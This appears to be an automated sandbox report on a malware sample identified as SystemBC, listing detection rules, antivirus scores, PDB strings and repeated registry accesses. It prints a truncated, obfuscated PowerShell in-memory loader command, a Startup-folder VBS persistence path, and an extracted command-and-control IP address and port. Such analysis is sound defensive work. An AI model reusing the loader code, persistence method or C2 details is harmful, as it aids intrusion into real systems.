                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 4304, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\lsass.exe, ParentImage: C:\Windows\System32\lsass.exe, ParentProcessId: 640, ParentProcessName: lsass.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , ProcessId: 1848, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'af'+'e'+''+'N'+''+[Char](97

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\vm6XYZzWOd.exe, ProcessId: 6772, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                      Source: 0.2.vm6XYZzWOd.exe.3c166a4.0.raw.unpackMalware Configuration Extractor: SystemBC {"NDATAHOST1": "212.162.153.199", "HOST2": "212.162.153.199", "PORT1": "4382"}
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4ReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Temp\$77eec42dReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeReversingLabs: Detection: 47%
                      Source: vm6XYZzWOd.exeReversingLabs: Detection: 47%
                      Source: vm6XYZzWOd.exeVirustotal: Detection: 37%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Code function: 3_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_00401000
                      Source: vm6XYZzWOd.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: vm6XYZzWOd.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000011.00000000.2381194238.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3566674758.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000011.00000000.2381194238.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3566674758.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ~1.PDB @ source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
